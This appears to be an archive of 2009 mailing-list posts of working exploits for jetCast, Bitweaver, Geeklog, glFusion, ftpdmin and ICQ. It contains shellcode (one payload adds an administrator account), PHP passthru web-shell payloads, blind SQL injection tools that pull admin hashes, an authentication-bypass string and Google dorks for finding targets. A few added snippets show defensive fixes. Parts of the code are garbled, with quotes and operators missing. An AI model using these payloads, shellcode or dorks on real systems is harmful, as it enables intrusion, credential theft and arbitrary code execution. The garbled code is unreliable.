cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
SharedUserData!SystemCallStub+0x4:
7ffe0304 c3              ret

prepare a network folder with the .url file inside. This works
against Internet Explorer too by a hyperlink to the network folder
*/

$x = "[InternetShortcut]\x0d\x0a".
     "URL=".str_repeat("\x61", 2184);
file_put_contents("9sg_poc.url", $x);
?>



#original url: http://retrogod.altervista.org/9sg_icq_dos.html


COWON America jetCast 2.0.4.1109 (.mp3) local heap buffer overflow exploit

2009-05-26 Thread nospam
?php

/*

COWON America jetCast 2.0.4.1109 (.mp3) local heap buffer overlow 
exploit (xp/sp3)

by Nine:Situations:Group::pyrokinesis

 

site: http://retrogod.altervista.org/

software site: http://www.jetaudio.com/

Tested against JetAudio pack v.7.5.2


-

Passing an overlong string as id3 tag we have:

 

(370.7a8): Access violation - code c005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=41414141 ebx=0394 ecx=41414141 edx=00160608 esi=010c1a00 
edi=0302fbc8

eip=00486db7 esp=0302fb14 ebp=0302fe7c iopl=0 nv up ei pl nz ac 
po nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= 
efl=00010212

jetCast+0x86db7:

00486db7 8b11mov edx,dword ptr [ecx]  
ds:0023:41414141=

 

code:

00486DB7  |. 8B11   MOV EDX,DWORD PTR DS:[ECX] ---crash

00486DB9  |. 8B8D ACFC  MOV ECX,DWORD PTR SS:[EBP-354]

00486DBF  |. FF52 0CCALL DWORD PTR DS:[EDX+C]

...


-

We have 4 bytes of ecx to redirect the program to edi, which keeps our
buffer. To do that first we set ecx to a portion of memory which *always*
(or nearly) keeps the filename.

Look 0x0105... no null char allowed, so I will use 0x01050101 to hit the
right offset.

To build it we need an address which points to a known call edi, compatible
with windows filenames. To achieve that you may do so:

x...@pyro ~/framework-2.2/tools

$ memdump (pid) jetcast

x...@pyro ~/framework-2.2/tools

$ cd ..

x...@pyro ~/framework-2.2/

$ msfpescan -d ./tools/jetcast/ -j edi

0x7d03388b call edi

...

x...@pyro ~/framework-2.2/tools

$ msfpescan -d ./tools/jetcast/ -x \x8b\x38\x03\x7d

0x028997c4   8b38037d

0x77e062f5   8b38037d

...

then subtract c. Repeat this for each call edi; it took me some time to find
every combination by a script and I finally found a good one in the
MSVCRT.DLL given with the program; a third match seems not possible.

Note: the first bytes of EDI keep some null chars, but as you can see, this
portion is nop-equivalent:

0348FBC8    ADD BYTE PTR DS:[EAX],AL

0348FBCA    ADD BYTE PTR DS:[EAX],AL

0348FBCC    ADD BYTE PTR DS:[EAX],AL

0348FBCE    ADD BYTE PTR DS:[EAX],AL

0348FBD0   90   NOP

0348FBD1   90   NOP

0348FBD2   90   NOP

...

 

Usage: php 9sg_jetcast_poc.php

It creates 4 files on your desktop; it says which will hit the right
offset on your system (the file path is important to achieve arbitrary code
execution on a victim user, so an attacker should persuade him to try to
stream them ...)
It works by dragging the file on it or by right clicking and selecting
Add files ..., not 100% reliable, version specific...


-

*/

 

error_reporting(0);

if (php_sapi_name()  cli)

{

die([!] Launch from the cli!);

}

 

$scode = \xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53. 
\xbb\x0d\x25\x86\x7c. //WinExec, 0x7c86250d

\xff\xd3\x31\xc0\x50. \xbb\x12\xcb\x81\x7c. //ExitProcess, 
0x7c81cb12

\xff\xd3\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65. 
\x78\x65\x20\x2f\x63\x20. cmd /c calc  . \xff;

 

if (strlen($scode)  118)

{

die([!] Shellcode too large here!);

}

$BOOM = 
\x49\x44\x33\x03\x00\x00\x00\x00\x07\x7b\x54\x49\x54\x32\x00\x00\x03\xbe\x00\x00\x00.
 str_repeat(\x90, 0x7c).//nop, very reusable

\xeb\x06\x90\x90. //jmp short

 

//\x01\x01\x06\x01. //less usually in this location...

\x01\x01\x05\x01. //eax - ecx, this works 80% of the times

\x90\x90\x90\x90. //nop

$scode. str_repeat(A, 0x01f0 - strlen($scode)). 
\x54\x41\x4c\x42\x00\x00\x00\x02\x00\x00\x00\x31\x54\x59\x45\x52\x00\x00\x00\x05\x00\x00\x00\x31\x39\x35\x30\x54\x43\x4f.
 
\x4e\x00\x00\x00\x02\x00\x00\x00\x31\x54\x43\x4f\x50\x00\x00\x00\x02\x00\x00\x00\x31\xff\xfb\x90\x64\x00\x00\x00\x00\x00\x00\x00.
 

Bitweaver <= 2.6 /boards/boards_rss.php / saveFeed() remote code execution exploit

2009-05-12 Thread nospam
<?php
/*
Bitweaver <= 2.6 /boards/boards_rss.php / saveFeed() remote code execution
exploit
by Nine:Situations:Group::bookoo
 
php.ini independent
 
site: http://retrogod.altervista.org/
software site: http://www.bitweaver.org/
 
You need a user account and you need to change your display name to:
 
{php}passthru($_SERVER[HTTP_CMD]);{/php}
 
Register and click on Preferences, look at the User Information tab,
inside the Real name text field write the code above, then click on Change.
 
Google dorks:
by bitweaver Version  powered +boards
You are running bitweaver in TEST mode|bitweaver * White Screen of Death
 
Versions tested: 2.6.0, 2.0.2
 
Vulnerability type: folder creation, file creation, file overwrite, PHP 
code injection.
 
Explanation:
look at /boards/boards_rss.php, line 102:
...
echo $rss->saveFeed( $rss_version_name, $cacheFile );
...
 
it calls the saveFeed() function in an insecure way; the arguments are built on
the $_REQUEST[version] var and may contain directory traversal sequences...
 
now look at the saveFeed() function in /rss/feedcreator.class.php
 
...
function saveFeed($filename="", $displayContents=true) {
    if ($filename=="") {
        $filename = $this->_generateFilename();
    }
    if ( !is_dir( dirname( $filename ))) {
        mkdir_p( dirname( $filename ));
    }
    $feedFile = fopen($filename, "w+");
    if ($feedFile) {
        fputs($feedFile,$this->createFeed());
        fclose($feedFile);
        if ($displayContents) {
            $this->_redirect($filename);
        }
    } else {
        echo "<br /><b>Error creating feed file, please check write permissions.</b><br />";
    }
}
 
}
...
 
regardless of php.ini settings, you can create arbitrary folders,
create/overwrite files, and you can also end the path with an arbitrary
extension other than .xml by passing a null char.
ex.
 

http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../bookoo.php%00
 
now you have a bookoo.php in the main folder:
 
<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="FeedCreator 1.7.2" -->
<?xml-stylesheet href="http://www.w3.org/2000/08/w3c-synd/style.css" type="text/css"?>
<rss version="0.91">
<channel>
<title> Feed</title>
<description></description>
<link>http://192.168.0.1</link>
<lastBuildDate>Sat, 09 May 2009 20:01:44 +0100</lastBuildDate>
<generator>FeedCreator 1.7.2</generator>
<language>en-us</language>
</channel>
</rss>
 
You could inject php code by the Host header (but this is used to build
filenames and creates problems, also most servers will respond with an http
error) inside the link tag, or by your display name in the title tag, ex.:
 

http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../bookoo_ii.php%00&u=bookoo&p=password
 
and here is the new file (if your display name is <?php
passthru($_GET[cmd]; ?>):
 
<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="FeedCreator 1.7.2" -->
<?xml-stylesheet href="http://www.w3.org/2000/08/w3c-synd/style.css" type="text/css"?>
<rss version="0.91">
<channel>
<title> Feed (<?php passthru($_GET[cmd]; ?>)</title>
<description></description>
<link>http://192.168.0.1</link>
<lastBuildDate>Tue, 12 May 2009 00:30:54 +0100</lastBuildDate>
<generator>FeedCreator 1.7.2</generator>
<language>en-us</language>
</channel>
</rss>
 
if short_open_tag in php.ini is off (because of the <?xml ... preamble
generating a parse error with short_open_tag = on), you can now launch
commands:
 
http://host/path_to_bitweaver/bookoo_ii.php?cmd=ls
 
However, to bypass short_open_tag = on you can inject in a template file,
ex.:
 

http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../themes/templates/footer_inc.tpl%00&u=bookoo&p=password
 
Now footer_inc.tpl looks like this:
 
<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="FeedCreator 1.7.2" -->
<?xml-stylesheet href="http://www.w3.org/2000/08/w3c-synd/style.css" type="text/css"?>
<rss version="0.91">
<channel>
<title> Feed ({php}passthru($_GET[CMD]);{/php})</title>
<description></description>
<link>http://192.168.0.1</link>
<lastBuildDate>Tue, 12 May 2009 00:43:01 +0100</lastBuildDate>
<generator>FeedCreator 1.7.2</generator>
<language>en-us</language>
</channel>
</rss>
 
note that the shellcode is in Smarty template syntax ...
 
Now you can launch commands from the main page:
 
http://host/path_to_bitweaver/index.php?cmd=ls%20-la
 
or
 
http://host/path_to_bitweaver/wiki/index.php?cmd=ls%20-la
 
Additional notes:
 
Without having an account you can create a denial of service condition,
ex. by replacing the main index.php:
 

http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../index.php%00
 
I found also a bug in Smarty template system, 
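As an added example (not Bitweaver's or FeedCreator's own code), this is how boards_rss.php could derive the cache file path from the untrusted version value so that neither the directory nor the extension is ever under the caller's control; the cache directory and the rss_ file prefix are assumptions.

```php
<?php
// Added example, not Bitweaver's or FeedCreator's code. The cache directory
// and the 'rss_' file prefix are assumptions; the point is that the request
// only selects a version token and never supplies a path.
function safeFeedPath(string $cacheDir, string $version): ?string
{
    // A feed version is digits and dots (0.91, 1.0, 2.0). Anything else,
    // including "../", a NUL byte (the %00 that cut the ".xml" off in the
    // advisory) or an attacker-chosen extension, is rejected here.
    if (!preg_match('/\A[0-9]+(\.[0-9]+)?\z/', $version)) {
        return null;
    }

    // The extension is appended by the server, never taken from the request.
    $target = $cacheDir . DIRECTORY_SEPARATOR . 'rss_' . $version . '.xml';

    // Defence in depth: the resolved parent of the target must be the cache
    // directory itself. realpath() is applied to the directory, not the file,
    // because it fails for a file that does not exist yet.
    $base   = realpath($cacheDir);
    $parent = realpath(dirname($target));
    if ($base === false || $parent === false || $parent !== $base) {
        return null;
    }
    return $target;
}

// Constructed inputs: the traversal value from the advisory and a real version.
$cacheDir = sys_get_temp_dir();
var_dump(safeFeedPath($cacheDir, "/../../../../bookoo.php\0"));
var_dump(safeFeedPath($cacheDir, '0.91'));
```

With the version reduced to a token, the mkdir_p() call in saveFeed() can no longer be made to create directories outside the cache, and a null byte never reaches fopen().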

Geeklog <= 1.5.2 savepreferences()/*blocks[] remote sql injection exploit

2009-04-16 Thread nospam
<?php
/*
Geeklog <= 1.5.2 savepreferences()/*blocks[] remote sql injection exploit
by Nine:Situations:Group::bookoo
 
our site: http://retrogod.altervista.org/
software site: http://www.geeklog.net/
 
PHP and MySQL version independent
 
vulnerability, see usersettings.php near lines 1467 - 1480:
 
...
if (isset ($_USER['uid']) && ($_USER['uid'] > 1)) {
    switch ($mode) {
        case 'saveuser':
            savepreferences ($_POST);
            $display .= saveuser($_POST);
            PLG_profileExtrasSave ();
            break;
 
        case 'savepreferences':
 
            savepreferences ($_POST);
            $display .= COM_refresh ($_CONF['site_url']
                . '/usersettings.php?mode=preferences&amp;msg=6');
            break;
...
 
all the $_POST[] variables are passed to the savepreferences() function;
now look at the function, again in usersettings.php:
 
...
function savepreferences($A) {
    global $_CONF, $_TABLES, $_USER;
 
    if (isset ($A['noicons']) && ($A['noicons'] == 'on')) {
        $A['noicons'] = 1;
    } else {
        $A['noicons'] = 0;
    }
    if (isset ($A['willing']) && ($A['willing'] == 'on')) {
        $A['willing'] = 1;
    } else {
        $A['willing'] = 0;
    }
    if (isset ($A['noboxes']) && ($A['noboxes'] == 'on')) {
        $A['noboxes'] = 1;
    } else {
        $A['noboxes'] = 0;
    }
    if (isset ($A['emailfromadmin']) && ($A['emailfromadmin'] == 'on')) {
        $A['emailfromadmin'] = 1;
    } else {
        $A['emailfromadmin'] = 0;
    }
    if (isset ($A['emailfromuser']) && ($A['emailfromuser'] == 'on')) {
        $A['emailfromuser'] = 1;
    } else {
        $A['emailfromuser'] = 0;
    }
    if (isset ($A['showonline']) && ($A['showonline'] == 'on')) {
        $A['showonline'] = 1;
    } else {
        $A['showonline'] = 0;
    }
 
    $A['maxstories'] = COM_applyFilter ($A['maxstories'], true);
    if (empty ($A['maxstories'])) {
        $A['maxstories'] = 0;
    } else if ($A['maxstories'] > 0) {
        if ($A['maxstories'] < $_CONF['minnews']) {
            $A['maxstories'] = $_CONF['minnews'];
        }
    }
 
    $TIDS  = @array_values($A[$_TABLES['topics']]);
    $AIDS  = @array_values($A['selauthors']);
    $BOXES = @array_values($A["{$_TABLES['blocks']}"]); //<- this is $_POST[(prefix)blocks]
    $ETIDS = @array_values($A['etids']);
 
    $tids = '';
    if (sizeof ($TIDS) > 0) {
        $tids = addslashes (implode (' ', $TIDS));
    }
 
    $aids = '';
    if (sizeof ($AIDS) > 0) {
        $aids = addslashes (implode (' ', $AIDS));
    }
 
    $selectedblocks = '';
    if (count ($BOXES) > 0) {
        $boxes = addslashes (implode (',', $BOXES)); //<-- this addslashes() is totally unuseful
 
        // SQL INJECTION HERE *** $boxes is not surrounded by quotes!
        $blockresult = DB_query("SELECT bid,name FROM {$_TABLES['blocks']} WHERE bid NOT IN ($boxes)");
 
        $numRows = DB_numRows($blockresult);
        for ($x = 1; $x <= $numRows; $x++) {
            $row = DB_fetchArray ($blockresult);
            if ($row['name'] <> 'user_block' AND $row['name'] <> 'admin_block' AND $row['name'] <> 'section_block') {
                $selectedblocks .= $row['bid'];
                if ($x < $numRows) {
                    $selectedblocks .= ' ';
                }
            }
        }
    }
...
 
read the lines commented!
 
This tool extracts the admin hash from the db by asking true/false questions
to MySQL and interpreting some checkboxes in the response, but requires a
simple user account.
 
vulnerability ii, information disclosure:
now I see that the table prefix is shown inside the html because they used table
names for the $_TABLES[] array
*/
 
$err[0] = [!] This script is intended to be launched from the cli!;
$err[1] = [!] You need the curl extesion loaded!;
 
if (php_sapi_name()  cli) {
die($err[0]);
}
if (!extension_loaded('curl')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
false;
if ($win) {
!dl(php_curl.dll) ? die($err[1]) :
nil;
} else {
!dl(php_curl.so) ? die($err[1]) :
nil;
}
}
 
function syntax() {
print (
Syntax: php .$argv[0]. [host] [path] [user] [pass] [OPTIONS] 
\n. Options:   
\n. --c:[uid:hash]  - use your user cookie, instead of uses/pwd pair   
\n. --port:[port]   - specify a port   
\n.   default-80  
\n. --uid:[n]   - specify an uid other than default (2,usually 
admin)\n. --proxy:[host:port] - use proxy 
 \n. --skiptest  - skip preliminary tests 
\n. --test  - run only tests  
   \n. Examples:   php .$argv[0]. 192.168.0.1 /geeklog/ bookoo pass 
 \n. php .$argv[0]. 192.168.0.1 / bookoo pass 
--proxy:1.1.1.1:8080\n. php .$argv[0]. 

ftpdmin v. 0.96 RNFR remote buffer overflow exploit

2009-04-11 Thread nospam
?php
/*
   ftpdmin v. 0.96 RNFR remote buffer overflow exploit (xp sp3 / case study)
   by Nine:Situations:Group::surfista
   software site: http://www.sentex.net/~mwandel/ftpdmin/
   our site: http://retrogod.altervista.org/

   bug found by rgod in 2006, RNFR sequences can trigger a simple eip overwrite.
   We can use 272 bytes before EIP and 119 after EIP; ESP and EBP point to
   the second memory region.
   We have a very small set of chars that we can use: the RNFR (Rename From)
   command accepts pathnames as argument, so characters whose integer
   representations are in the range from zero through 31 and reserved chars
   are not allowed!
*/

error_reporting(7);
$ftp_server = 192.168.0.1;
$ftp_user   = anonymous;
$ftp_pass   = a...@email.com;

function ftp_cmd($cmd){
global $conn_id;
echo - .$cmd.\n;
$buff=ftp_raw($conn_id,$cmd);
}

#WinExec shellcode of mine, enconded with the alpha2 tool by 
SkyLined, adds
#a surfista admin user with pass pass
#contains hardcoded address, re-encode command:
#alpha2 esp  shdmp.txt

$scode=TY7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI.
   
Xkb3SkfQkpBp4qo0nhBcaZPSMknMq3mValkOYCtqYPYxxhKO9okOe3BMrD5pTocS5.
   
prnReqDWPCev32e1BWPt3sEQbRFE9T3PtqqWPRPSQPsBSUpTosqctRdWPGVa6epPN.
   
w5F4EpRlRossG1PLw7brpOrupP5paQ1tPmaypnSYbSPtd2Pa44BOT2T3UpfOw1qTw.
   4gPqcpupr3VQybSrTE1kOA;  
#do not touch, esp adjustment and subsequent call esp, very 
large but we have lots of unused space
$code 
=TY7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI.
   
NcXl1oK3JLsOOs8lSOMSXlQoK3zL14KOm4F22EbSrOpusBSSsUGPpipdUpesVVA;
if (strlen($scode)  272) {die([!] shellcode too large!);}
$conn_id = ftp_connect($ftp_server) or die((!) Unable to 
connect to $ftp_server);
if (@ftp_login($conn_id, $ftp_user, $ftp_pass)) {
echo (*) Connected as $ftp_u...@$ftp_server\n;
} else {
die((!) Unable to connect as $ftp_user\n);
}
$jnk = str_repeat(\x66,272 - strlen($scode));
$eip=\x44\x3a\x41\x7e; //0x7E413A44  jmp esp, 
user32.dll xp sp3
$jnk_ii = str_repeat(\x66,119 - strlen($code));
$bof=$scode.$jnk.$eip.$code.$jnk_ii;
$boom=RNFR .str_repeat(x,0x0096);
ftp_cmd($boom);
$boom=RNFR .$bof;
ftp_cmd($boom);
$boom=RNFR .str_repeat(x,0x0208);
ftp_cmd($boom);
ftp_close($conn_id);
echo (*) Done !\n;
?

url: http://retrogod.altervista.org/9sg_ftpdmin_096_rnfr_bof.html


Geeklog <=1.5.2 'SESS_updateSessionTime()' vulnerability

2009-04-09 Thread nospam
As the vendor stated, see:

http://www.geeklog.net/article.php/geeklog-1.5.2sr2

geeklog is also vulnerable to this:

http://www.securityfocus.com/bid/34361/info

actually this should be renamed to

glFusion 'SESS_updateSessionTime()' SQL Injection Vulnerability


Geeklog <=1.5.2 SEC_authenticate()/PHP_AUTH_USER sql injection exploit

2009-04-09 Thread nospam
<?php

/*

Geeklog <=1.5.2 SEC_authenticate()/PHP_AUTH_USER sql injection exploit

by Nine:Situations:Group::bookoo

our site: http://retrogod.altervista.org/

software site: http://www.geeklog.net/

credit goes to rgod, bug found more than a year ago

working against PHP >= 5.0

google dorks: By Geeklog Created this page in +seconds +powered
              By Geeklog Created this page in +seconds +powered inurl:public_html



vulnerability, see /public_html/webservices/atom/index.php near lines 34-53:

...
require_once '../../lib-common.php';

if (PHP_VERSION < 5) {
    $_CONF['disable_webservices'] = true;
} else {
    require_once $_CONF['path_system'] . '/lib-webservices.php';
}
if ($_CONF['disable_webservices']) {
    COM_displayMessageAndAbort($LANG_404[3], '', 404, 'Not Found');
}
header('Content-type: ' . 'application/atom+xml' . '; charset=UTF-8');
WS_authenticate();
...

now the WS_authenticate() function in /system/lib-webservices.php near lines
780-877:

...
function WS_authenticate()
{
    global $_CONF, $_TABLES, $_USER, $_GROUPS, $_RIGHTS, $WS_VERBOSE;

    $uid = '';
    $username = '';
    $password = '';

    $status = -1;

    if (isset($_SERVER['PHP_AUTH_USER'])) {
        $username = $_SERVER['PHP_AUTH_USER'];
        $password = $_SERVER['PHP_AUTH_PW'];

        if ($WS_VERBOSE) {
            COM_errorLog("WS: Attempting to log in user '$username'");
        }
    } elseif (!empty($_SERVER['REMOTE_USER'])) {

        list($auth_type, $auth_data) = explode(' ', $_SERVER['REMOTE_USER']);
        list($username, $password) = explode(':', base64_decode($auth_data));

        if ($WS_VERBOSE) {
            COM_errorLog("WS: Attempting to log in user '$username' (via \$_SERVER['REMOTE_USER'])");
        }
    } else {
        if ($WS_VERBOSE) {
            COM_errorLog("WS: No login given");
        }

    }

...

and after, near lines 907-909:

...
    if (($status == -1) && $_CONF['user_login_method']['standard']) {
        $status = SEC_authenticate($username, $password, $uid);
    }
...

now open /system/lib-security.php near lines 695-717:

...
function SEC_authenticate($username, $password, $uid)
{
    global $_CONF, $_TABLES, $LANG01;

    $result = DB_query("SELECT status, passwd, email, uid FROM {$_TABLES['users']} WHERE username='$username' AND ((remoteservice is null) or (remoteservice = ''))"); //<--- SQL INJECTION HERE
    $tmp = DB_error();
    $nrows = DB_numRows($result);

    if (($tmp == 0) && ($nrows == 1)) {
        $U = DB_fetchArray($result);
        $uid = $U['uid'];
        if ($U['status'] == USER_ACCOUNT_DISABLED) {
            // banned, jump to here to save an md5 calc.
            return USER_ACCOUNT_DISABLED;
        } elseif ($U['passwd'] != SEC_encryptPassword($password)) {

            return -1; // failed login
        } elseif ($U['status'] == USER_ACCOUNT_AWAITING_APPROVAL) {
            return USER_ACCOUNT_AWAITING_APPROVAL;
        } elseif ($U['status'] == USER_ACCOUNT_AWAITING_ACTIVATION) {
            // Awaiting user activation, activate:
            DB_change($_TABLES['users'], 'status', USER_ACCOUNT_ACTIVE,
                      'username', $username);
            return USER_ACCOUNT_ACTIVE;
        } else {
            return $U['status']; // just return their status
        }
    } else {
        $tmp = $LANG01[32] . ": '" . $username . "'";
        COM_errorLog($tmp, 1);
        return -1;
    }
}
...



you can inject sql code in the 'username' argument of this function; it may
come from the $_SERVER['PHP_AUTH_USER'] or $_SERVER['REMOTE_USER'] php
variables.
These vars are used for both HTTP Basic and Digest Authentication methods,
see the PHP manual:

http://www.php.net/manual/en/features.http-auth.php

manual poc, visit http://host/path_to_geeklog/webservices/atom/index.php
then type:

username: ' AND 0 UNION SELECT 3,MD5(''),null,2 FROM gl_users LIMIT 1/*
password: 

authentication mechanism is bypassed!
Note that it is passed base64_encode()'d !



Now you have access to some dangerous functions:

service_submit_staticpages()
service_delete_staticpages()
service_get_staticpages()
service_getTopicList_staticpages()

in /plugins/staticpages/services.inc.php

service_submit_story()
service_delete_story()
service_get_story()
service_getTopicList_story()

in /system/lib-story.php

ex. the service_submit_staticpages() one allows one to specify a dangerous
sp_php flag in submitting staticpages; if the staticapages.PHP permission
is set to true for the staticpage admin (not the default), the page will be
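As an added example (not Geeklog's own code), the SEC_authenticate() lookup rewritten with a PDO prepared statement, so that whatever arrives in PHP_AUTH_USER or the base64-decoded REMOTE_USER is bound as data and can never close the quote around username; the table name and the PDO handle are assumptions, the column list follows the query quoted above.

```php
<?php
// Added example, not Geeklog's code: the SEC_authenticate() lookup done with
// a PDO prepared statement. Table name and PDO handle are assumptions.
function findLocalUser(PDO $db, string $usersTable, string $username): ?array
{
    // Identifiers cannot be bound, so the table name is fixed server-side.
    // The username is bound as data and never becomes part of the SQL text,
    // so a quote or a UNION inside the credential has no syntactic effect.
    $sql = "SELECT status, passwd, email, uid FROM {$usersTable} "
         . "WHERE username = :username "
         . "AND ((remoteservice IS NULL) OR (remoteservice = ''))";
    $stmt = $db->prepare($sql);
    $stmt->execute([':username' => $username]);
    $rows = $stmt->fetchAll(PDO::FETCH_ASSOC);

    // Keep the original's rule: exactly one matching row, otherwise no login.
    return count($rows) === 1 ? $rows[0] : null;
}

// Constructed demo on an in-memory SQLite database with one local account.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE gl_users (uid INTEGER, username TEXT, passwd TEXT, "
        . "email TEXT, status INTEGER, remoteservice TEXT)");
$db->exec("INSERT INTO gl_users VALUES (2, 'Admin', 'hash', "
        . "'admin@example.invalid', 3, NULL)");

// The genuine name matches one row; the advisory's manual PoC value is now
// just a username nobody has, so it matches nothing.
$pocUsername = "' AND 0 UNION SELECT 3,MD5(''),null,2 FROM gl_users LIMIT 1/*";
var_dump(findLocalUser($db, 'gl_users', 'Admin') !== null);
var_dump(findLocalUser($db, 'gl_users', $pocUsername) === null);
```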


glFusion <= 1.1.2 COM_applyFilter()/cookies remote blind sql injection exploit

2009-04-03 Thread nospam
<?php
/*
glFusion <= 1.1.2 COM_applyFilter()/cookies remote blind sql injection
exploit
by Nine:Situations:Group::bookoo
 
our site: http://retrogod.altervista.org/
software site: http://www.glfusion.org/
 
google dork: Page created in seconds by glFusion +RSS
 
Found another vector of injection in /private/system/lib-session.php near
lines 97-117:
...
if (isset ($_COOKIE[$_CONF['cookie_session']])) {
    $sessid = COM_applyFilter ($_COOKIE[$_CONF['cookie_session']]);
    if ($_SESS_VERBOSE) {
        COM_errorLog("got $sessid as the session id from lib-sessions.php",1);
    }
 
    $userid = SESS_getUserIdFromSession($sessid, $_CONF['session_cookie_timeout'], $_SERVER['REMOTE_ADDR'], $_CONF['cookie_ip']);
 
    if ($_SESS_VERBOSE) {
        COM_errorLog("Got $userid as User ID from the session ID",1);
    }
 
    if ($userid > 1) {
        // Check user status
 
        $status = SEC_checkUserStatus($userid);
        if (($status == USER_ACCOUNT_ACTIVE) ||
            ($status == USER_ACCOUNT_AWAITING_ACTIVATION)) {
            $user_logged_in = 1;
 
            SESS_updateSessionTime($sessid, $_CONF['cookie_ip']);
 
...
 
see the SESS_updateSessionTime() function near lines 418-436:
 
...
function SESS_updateSessionTime($sessid, $md5_based=0) {
    global $_TABLES;
 
    $newtime = (string) time();
 
    if ($md5_based == 1) {
 
        $sql = "UPDATE {$_TABLES['sessions']} SET start_time=$newtime WHERE (md5_sess_id = '$sessid')";
    } else {
 
        $sql = "UPDATE {$_TABLES['sessions']} SET start_time=$newtime WHERE (sess_id = $sessid)"; // SQL INJECTION HERE
 
    }
 
    $result = DB_query($sql);
 
    return 1;
}
...
 
if the session id is not md5() hashed in the general configuration, which is
the default, you can inject arbitrary SQL statements.
 
Note that the query in the SESS_getUserIdFromSession() function:
 
...
    if ($md5_based == 1) {
        $sql = "SELECT uid FROM {$_TABLES['sessions']} WHERE "
             . "(md5_sess_id = '$sessid') AND (start_time > $mintime) AND (remote_ip = '$remote_ip')";
    } else {
 
        $sql = "SELECT uid FROM {$_TABLES['sessions']} WHERE "
             . "(sess_id = '$sessid') AND (start_time > $mintime) AND (remote_ip = '$remote_ip')";
    }
...
 
compares the supplied sessid value with the sessid value from the sessions
table, which is an integer.
MySQL, like php, when comparing them only considers the leading integer value
of the supplied string.
So the function returns a valid userid and, if you know an existing sessid
in the table, you can inject queries in cookies, like this:
 
Cookie: glf_session=12345678 [SQL HERE]; glfusion=99;
 
This tool uses delays to extract an admin hash from the users table, but needs
a simple user account;
 
some improvement in find_prefix();
 
working against MySQL >= 5.0.12, where the SLEEP() function is available
or ... if you find another solution for delays, with MySQL >= 4.1, which
supports SELECT subqueries
(BENCHMARK() cannot be used because commas are filtered by the
COM_applyFilter() function)
 
*/
 
$err[0] = [!] This script is intended to be launched from the cli!;
$err[1] = [!] You need the curl extesion loaded!;
 
if (php_sapi_name()  cli) {
die($err[0]);
}
if (!extension_loaded('curl')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
false;
if ($win) {
!dl(php_curl.dll) ? die($err[1]) :
nil;
} else {
!dl(php_curl.so) ? die($err[1]) :
nil;
}
}
 
function syntax() {
print (
Syntax: php .$argv[0]. [host] [path] [user] [pass] [OPTIONS] 
\n. Options: 
\n. --port:[port]   - specify a port 
\n.   default-80  
\n. --prefix- try to extract table prefix from 
information.schema\n.   default-gl_  
   \n. --uid:[n]   - specify an uid other than default 
(2,usually admin)\n. --proxy:[host:port] - use proxy  
\n. --verbose   - show more informations  
   \n. --skiptest  - skip preliminary tests   
  \n. --test  - run only tests
 \n. Examples:   php .$argv[0]. 192.168.0.1 /glfusion/ bookoo 
pass  \n. php .$argv[0]. 192.168.0.
 1 / bookoo pass --prefix --proxy:1.1.1.1:8080\n. php 
.$argv[0]. 192.168.0.1 / bookoo pass --prefix --uid:3);
die();
}
 
error_reporting(E_ALL ^ E_NOTICE);
$host = $argv[1];
$path = $argv[2];
$_user = $argv[3];
$_pwd = $argv[4];
 
$prefix = gl_;
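The two integer-typed injection points above, Geeklog's (prefix)blocks[] list in savepreferences() and glFusion's sess_id cookie in SESS_updateSessionTime(), share one fix: validate the type before the value reaches the SQL text. This is an added example, not Geeklog's or glFusion's code, and the table names are assumptions.

```php
<?php
// Added example, not Geeklog's or glFusion's code. Both injection points
// take values that are supposed to be integers and splice them into SQL
// without quotes, where addslashes() and COM_applyFilter() do nothing useful.
// Table names are assumptions.

// Strict integer parse: digits only, nothing around them. MySQL's own
// string-to-int coercion silently accepts "12345678 [SQL HERE]"; this
// function does not.
function strictInt(string $value): ?int
{
    return preg_match('/\A[0-9]{1,18}\z/', $value) ? (int) $value : null;
}

// glFusion's SESS_updateSessionTime() case: a single integer session id.
function sessionUpdateSql(string $sessionsTable, string $sessid, int $newtime): ?string
{
    $id = strictInt($sessid);
    if ($id === null) {
        return null;   // invalid cookie: run no query at all
    }
    return "UPDATE {$sessionsTable} SET start_time={$newtime} WHERE (sess_id = {$id})";
}

// Geeklog's savepreferences() case: a list of block ids for NOT IN (...).
function blocksExclusionSql(string $blocksTable, array $boxes): ?string
{
    $ids = [];
    foreach ($boxes as $box) {
        $id = strictInt((string) $box);
        if ($id === null) {
            return null;   // one bad element rejects the whole list
        }
        $ids[] = $id;
    }
    if ($ids === []) {
        return null;       // "NOT IN ()" is not valid SQL anyway
    }
    return "SELECT bid,name FROM {$blocksTable} WHERE bid NOT IN (" . implode(',', $ids) . ")";
}

// Constructed inputs, in the shapes the two advisories describe.
var_dump(sessionUpdateSql('gl_sessions', '12345678', 1241733654));
var_dump(sessionUpdateSql('gl_sessions', '12345678 [SQL HERE]', 1241733654));
var_dump(blocksExclusionSql('gl_blocks', ['1', '7', '12']));
var_dump(blocksExclusionSql('gl_blocks', ['1', '7 [SQL HERE]']));
```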

glFusion <= 1.1.2 COM_applyFilter()/order sql injection exploit

2009-03-30 Thread nospam
 
<?php
/*
glFusion <= 1.1.2 COM_applyFilter()/order sql injection exploit
by Nine:Situations:Group::bookoo

working against MySQL >= 4.1
php.ini independent

  our site: http://retrogod.altervista.org/
software site: http://www.glfusion.org/

google dork: Page created in seconds by glFusion +RSS

Vulnerability, sql injection in the 'order' and 'direction' arguments:
look at the ExecuteQueries() function in
/private/system/classes/listfactory.class.php, near line 336:
...

// Get the details for sorting the list
